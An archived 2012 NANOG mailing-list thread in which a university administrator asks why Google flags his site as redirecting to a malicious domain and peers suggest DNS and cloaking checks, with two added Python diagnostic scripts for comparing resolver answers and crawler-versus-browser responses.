2012-06-26 Thread Matthew Black
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach


-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com] 
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects 
> users to another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files 
> and are not redirecting to the problem target site. No recent changes 
> either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Running Apache on three Solaris webservers behind a load balancer. No MS 
Windows!

Not sure how malicious software could get between our load balancer and Unix 
servers. Thanks for the tip!

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 9:07 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Is it possible that some malicious software is listening and injecting a 
redirect on the wire?  We've seen this before with a Windows machine being 
infected.
On 26 June 2012 20:53, Matthew Black wrote:
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu



--
Landon Stewart <lstew...@superb.net>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net



Re: DNS poisoning at Google?

2012-06-26 Thread Kevin Day

On Jun 26, 2012, at 10:53 PM, Matthew Black wrote:

> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?

Not sure if it's related, but yesterday one of my clients (a top 500 alexa 
site) suddenly had most search results (when googling for things like the 
site's name) suddenly change to some other shady looking domain that's just 
sending 302 redirects to the real site. All the same search results are there, 
but they're now sending everyone to the wrong domain that's just redirecting to 
the correct place. No idea how Google thought this is correct and I'm totally 
failing at getting anyone's attention at Google to look into this.

This coincided with this message from @google on twitter yesterday:

Heads up: we're pushing a new Panda data refresh that noticeably affects only 
~1% of queries worldwide.
http://twitter.com/google/status/217366321879453696

But I'm not sure that's related either.

-- Kevin




Re: DNS poisoning at Google?

2012-06-26 Thread Sadiq Saif
DNS seems to check out from here. Tested against Google DNS, OpenDNS
and Linode's DNS servers.

According to Google:
"Malicious software is hosted on 1 domain(s), including couchtarts.com/."

Normally, I would say this happens due to malicious ads loaded but
this does not seem to be a site that will contain ads. :)

On Wed, Jun 27, 2012 at 12:12 AM, Ishmael Rufus  wrote:
> I am also getting the same issue when accessing his website.
>
> On Tue, Jun 26, 2012 at 11:07 PM, Landon Stewart wrote:
>
>> Is it possible that some malicious software is listening and injecting a
>> redirect on the wire?  We've seen this before with a Windows machine being
>> infected.
>>
>> On 26 June 2012 20:53, Matthew Black  wrote:
>>
>> > Google Safe Browsing and Firefox have marked our website as containing
>> > malware. They claim our home page returns no results, but redirects users
>> > to another compromised website couchtarts.com.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files and
>> > are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> > intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> > www.csulb.edu
>> >
>> >
>>
>>
>> --
>> Landon Stewart 
>> Sr. Administrator
>> Systems Engineering
>> Superb Internet Corp - 888-354-6128 x 4199
>> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
>>



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org

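Sadiq's test above (the same name asked of Google DNS, OpenDNS and Linode's resolvers, then compared with what the site's own servers answer) is the right check for the "poisoned resolver" theory, and it is worth automating. The script below is an added example, not something posted in this thread: it builds a plain UDP A query by hand with the standard library, sends it to a list of recursive resolvers, and reports any address that is not in the set the zone's authoritative servers return. The name, the expected address set and the `build_response` fixture are constructed for illustration; the two default resolver addresses are Google Public DNS and OpenDNS.

```python
"""Ask several recursive resolvers for a name's A records and flag answers
that the zone's own authoritative servers do not return. Stdlib only; the
DNS message is built and parsed by hand (A records over UDP)."""
import random
import socket
import struct
import sys

def encode_name(name: str) -> bytes:
    """Wire-format a domain name as length-prefixed labels ending in a zero byte."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_query(name: str, txid: int) -> bytes:
    """Standard recursive (RD=1) query, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)

def build_response(name: str, txid: int, addrs: list) -> bytes:
    """Constructed reply used for offline testing: NOERROR, one A RR per address,
    each owner name written as a compression pointer back to the question (0xC00C)."""
    msg = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addrs), 0, 0)
    msg += encode_name(name) + struct.pack("!HH", 1, 1)
    for a in addrs:
        msg += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton(a)
    return msg

def _skip_name(msg: bytes, off: int) -> int:
    """Offset just past a domain name; a compression pointer (top two bits set) ends it."""
    while True:
        ln = msg[off]
        if ln == 0:
            return off + 1
        if ln & 0xC0 == 0xC0:
            return off + 2
        off += 1 + ln

def parse_a_answers(msg: bytes, expect_txid: int) -> list:
    """A-record addresses from a response, in answer order. A transaction id that
    does not match is rejected (stale or spoofed reply), as is any non-zero RCODE."""
    txid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", msg, 0)
    if txid != expect_txid:
        raise ValueError("transaction id mismatch")
    if flags & 0x000F:
        raise ValueError("rcode=%d" % (flags & 0x000F))
    off = 12
    for _ in range(qd):
        off = _skip_name(msg, off) + 4          # skip QTYPE and QCLASS
    addrs = []
    for _ in range(an):
        off = _skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen                            # CNAME and other types are skipped
    return addrs

def query_a(name: str, resolver: str, timeout: float = 3.0) -> list:
    """Send one query over UDP to `resolver` and return its A answers."""
    txid = random.randrange(0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (resolver, 53))
        data, _ = s.recvfrom(4096)
    return parse_a_answers(data, txid)

def find_outliers(expected: set, observed: dict) -> dict:
    """resolver -> addresses it returned that are not in the authoritative set."""
    out = {}
    for resolver, addrs in observed.items():
        bad = [a for a in addrs if a not in expected]
        if bad:
            out[resolver] = bad
    return out

if __name__ == "__main__":
    # usage: python dnscheck.py www.example.edu 192.0.2.10,192.0.2.11 [resolver ...]
    # (the name and expected addresses here are placeholders; supply your own,
    # taking the expected set from a direct query to your authoritative servers)
    name, expected = sys.argv[1], set(sys.argv[2].split(","))
    resolvers = sys.argv[3:] or ["8.8.8.8", "208.67.222.222"]   # Google DNS, OpenDNS
    observed = {}
    for r in resolvers:
        try:
            observed[r] = query_a(name, r)
        except (OSError, ValueError) as e:
            print(f"{r}: no usable answer ({e})")
    for r, bad in find_outliers(expected, observed).items():
        print(f"{r}: unexpected answers {bad}")
```

Run it repeatedly over a few minutes: a resolver that is only sometimes wrong, as Matthew describes, will show up as an outlier on some runs and not others, and a resolver whose reply carries the wrong transaction id is reported rather than trusted. Querying the authoritative servers with the same tool first gives you the expected set to compare against.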


RE: DNS poisoning at Google?

2012-06-26 Thread David Hubbard
Typically if google were pulling your site sometimes from the
wrong IP, their safe browsing page should indicate it being
on another AS number in addition to the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu

For example, the couchtarts site they claim yours is 
redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com

That site's DNS is screwed up and some requests are sent
to a different IP at a different host, so Google picked
up both AS numbers.

Could one of your domain's subdomains be what is
actually infected?  You seem to have a bunch of
them, maybe google is penalizing the whole domain over
a subdomain?  Not sure if they do that or not.

If your sites are running off of an application like
wordpress, etc., you may not get the same page that
google gets and the application may have been hacked.
Here's a wget command you can use to make requests to
your site pretending to be google:

wget -c \
  --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
  --output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making
it not correct so you'll have to put it back together
correctly.  It will save the output to a file named
googlebot.html you can look at to see if anything weird
ends up being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as 
> containing malware. They claim our home page returns no 
> results, but redirects users to another compromised website 
> couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf 
> files and are not redirecting to the problem target site. No 
> recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
> 
> 
> 

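David's wget test checks one half of the cloaking question: what the site serves when the client claims to be Googlebot. The other half is comparing that against what a browser gets, and doing so without following redirects, since a 302 to another domain is exactly the symptom Google reported. The script below is an added example, not code from this thread: it fetches a URL twice with different User-Agent strings, keeps any 3xx response instead of following it, and reports hosts (redirect targets, script sources, meta refreshes, JavaScript location assignments written as absolute URLs) that appear only in the crawler's copy. The browser UA string and the sample URL are placeholders; the Googlebot UA is the one David quotes.

```python
"""Fetch one URL as a browser and as Googlebot without following redirects,
then report hosts or redirect targets that only the crawler is sent to.
Stdlib only."""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urlparse

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0"  # placeholder

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """urllib follows 3xx silently by default; returning None here makes the
    opener raise HTTPError for the 3xx instead, so the redirect itself is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def fetch(url: str, user_agent: str, timeout: float = 10.0) -> tuple:
    """(status, headers, body) for one request; 3xx responses are returned, not followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers), err.read().decode("utf-8", "replace")

_URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def referenced_hosts(status: int, headers: dict, body: str) -> set:
    """Hosts a response points the client at: the Location header on a 3xx, plus
    every absolute http(s) URL in the body (script src, meta refresh, JS location)."""
    hosts = {h.lower() for h in _URL_RE.findall(body)}
    loc = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and loc:
        host = urlparse(loc).hostname
        if host:
            hosts.add(host.lower())
    return hosts

def crawler_only_hosts(url: str, browser: tuple, bot: tuple) -> set:
    """Hosts referenced in the Googlebot response but neither in the browser
    response nor equal to the site itself. Anything listed here deserves a look."""
    own = (urlparse(url).hostname or "").lower()
    return referenced_hosts(*bot) - referenced_hosts(*browser) - {own}

def compare(url: str) -> set:
    """Live comparison of the two views of `url`."""
    return crawler_only_hosts(url, fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA))

if __name__ == "__main__":
    # usage: python cloakcheck.py http://www.example.edu/   (placeholder URL)
    for host in sorted(compare(sys.argv[1])):
        print("served only to Googlebot:", host)
```

Because the check runs against the public hostname, it sees whatever sits in the path (load balancer included), which is what you want when, as Landon suggests, something between the client and the origin may be injecting the redirect. Running the same script against each origin server's address directly, with a Host header, is the natural next step for isolating where the difference is introduced.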


Re: DNS poisoning at Google?

2012-06-26 Thread Michael J Wise

On Jun 26, 2012, at 9:07 PM, Ishmael Rufus wrote:

> I'm glad I'm not the only one that missed this one:
> 
> http://www.csulb.edu
> 
> It is in his signature and email address as well ;)

The queries do seem to be taking a number of seconds, though, as opposed to 
being nearly instant when I reference the DNS servers of record directly.
The results I get at home (via SpeakEasy) all appear correct, though.

> On Tue, Jun 26, 2012 at 11:04 PM, Sadiq Saif  wrote:
> 
>> Accidentally sent that to Matthew only,
>> 
>> mind sharing the domain name?
>> 
>> On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black 
>> wrote:
>>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects users
>> to another compromised website couchtarts.com.
>>> 
>>> We have thoroughly examined our root .htaccess and httpd.conf files and
>> are not redirecting to the problem target site. No recent changes either.
>>> 
>>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>>> 
>>> We believe the DNS servers used by Google's crawler have been poisoned.
>>> 
>>> Can anyone shed some light on this?
>>> 
>>> matthew black
>>> information technology services
>>> california state university, long beach
>>> www.csulb.edu
>>> 
>> 
>> 
>> 
>> --
>> Sadiq S
>> O< ascii ribbon campaign - stop html mail - www.asciiribbon.org
>> 
>> 

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."




Re: DNS poisoning at Google?

2012-06-26 Thread Ishmael Rufus
I am also getting the same issue when accessing his website.

On Tue, Jun 26, 2012 at 11:07 PM, Landon Stewart wrote:

> Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
>
> On 26 June 2012 20:53, Matthew Black  wrote:
>
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects users
> > to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> > are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
> >
>
>
> --
> Landon Stewart 
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
>


Re: DNS poisoning at Google?

2012-06-26 Thread Ishmael Rufus
I'm glad I'm not the only one that missed this one:

http://www.csulb.edu

It is in his signature and email address as well ;)



On Tue, Jun 26, 2012 at 11:04 PM, Sadiq Saif  wrote:

> Accidentally sent that to Matthew only,
>
> mind sharing the domain name?
>
> On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black 
> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
>
>
>
> --
> Sadiq S
> O< ascii ribbon campaign - stop html mail - www.asciiribbon.org
>
>


Re: DNS poisoning at Google?

2012-06-26 Thread Landon Stewart
Is it possible that some malicious software is listening and injecting a
redirect on the wire?  We've seen this before with a Windows machine being
infected.

On 26 June 2012 20:53, Matthew Black  wrote:

> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>
>


-- 
Landon Stewart 
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": http://www.superbhosting.net


Re: DNS poisoning at Google?

2012-06-26 Thread Sadiq Saif
Accidentally sent that to Matthew only,

mind sharing the domain name?

On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black  wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org



DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu